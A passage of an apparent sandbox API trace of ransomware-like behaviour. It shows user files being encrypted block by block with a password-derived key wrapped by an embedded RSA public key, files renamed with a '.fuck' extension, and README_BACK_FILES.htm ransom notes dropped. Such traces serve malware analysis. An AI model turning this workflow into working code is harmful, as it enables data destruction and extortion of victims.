[0267.184] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.184] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.185] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.186] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.187] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.188] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x100, lpOverlapped=0x0) returned 1 [0267.188] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x110) returned 1 [0267.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x110, lpOverlapped=0x0) returned 1 [0267.188] CloseHandle (hObject=0x5d44) returned 1 [0267.188] CloseHandle (hObject=0x5d3c) returned 1 [0267.188] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1"), bFailIfExists=0) returned 1 [0267.191] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1", dwFileAttributes=0x0) returned 1 [0267.192] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1.gsg")) returned 1 [0267.194] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\en-us.1.fuck")) returned 1 [0267.195] CryptDestroyHash (hHash=0x2e7ec80) returned 1 [0267.195] CryptDestroyKey (hKey=0x2e7f480) returned 1 [0267.195] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0267.195] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.195] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\readme_back_files.htm")) returned 0xffffffff [0267.196] AreFileApisANSI () returned 1 [0267.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0267.196] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.197] GetFileType (hFile=0x5d48) returned 0x1 [0267.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.198] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.198] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.199] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.199] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.199] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\37JGORX3\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.199] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.200] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.200] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.200] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\37JGORX3\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\37jgorx3\\readme_back_files.htm")) returned 0xffffffff [0267.200] AreFileApisANSI () returned 1 [0267.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0267.200] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\37JGORX3\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\37jgorx3\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.202] GetFileType (hFile=0x5d3c) returned 0x1 [0267.202] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.203] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.204] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.204] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.205] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.205] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.205] GetLastError () returned 0x0 [0267.205] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml")) returned 0x2020 [0267.205] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml", dwFileAttributes=0x80) returned 1 [0267.206] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.207] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml.gsg", dwFileAttributes=0x2) returned 1 [0267.208] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2e7a500) returned 1 [0267.210] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.211] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.211] CryptHashData (hHash=0x2e7f880, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.211] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7f880, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f4c0) returned 1 [0267.211] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.211] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.211] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2e78630) returned 1 [0267.211] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78630, dwCertEncodingType=0x1, pInfo=0x2eb0000*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0030*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0038*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f680) returned 1 [0267.211] CryptEncrypt (in: hKey=0x2e7f680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.211] CryptEncrypt (in: hKey=0x2e7f680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e786b8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2e786b8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.212] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e786b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2e786b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd, lpOverlapped=0x0) returned 1 [0267.214] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0267.214] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x10, lpOverlapped=0x0) returned 1 [0267.214] CloseHandle (hObject=0x5d44) returned 1 [0267.214] CloseHandle (hObject=0x5d4c) returned 1 [0267.214] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet 